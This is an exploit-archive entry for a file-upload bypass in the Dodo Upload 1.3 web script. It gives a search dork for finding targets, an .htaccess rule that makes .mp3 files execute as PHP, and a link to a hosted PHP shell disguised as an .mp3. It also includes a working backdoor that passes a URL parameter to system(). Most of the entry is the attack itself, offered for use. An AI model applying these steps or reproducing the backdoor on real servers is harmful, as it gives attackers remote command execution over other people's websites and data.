Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability

2010-02-15T00:00:00
ID 1337DAY-ID-10912
Type zdt
Reporter indoushka
Modified 2010-02-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability 
============================================================

========================================================================================                 
| # Title    : Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability                   
| # Author   : indoushka                                 
| # Total alerts found : 1                                               
|                High  : 1                                                                      
|              Medium  :                                                                       
|                  Low :                                                                           
|       Informational  :                                                            
| # Web Site : www.iq-ty.com                                                          
| # Published: http://regretless.com/scripts/                                                                       
| # Dork     : Powered by Dodo, Bubo & Misty. Feed us!                           
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Shell upload                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- Shell upload
 
http://localhost/dodoupload/index.php
 
now to by pass Uploader put this code in document text and save as .htaccess
 
code :
 
<FilesMatch "^.*\.mp3">
   SetHandler application/x-httpd-php
</FilesMatch>
 
now save your evil php to mp3
 
exampl: evil.mp3 (http://www.freewebtown.com/indoushka/indoushka/ch99.php)
 
find your evil in
 
http://localhost/dodoupload/evil.mp3
 
and you can upload a simple backdoor
 
code :
 
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>



#  0day.today [2018-02-02]  #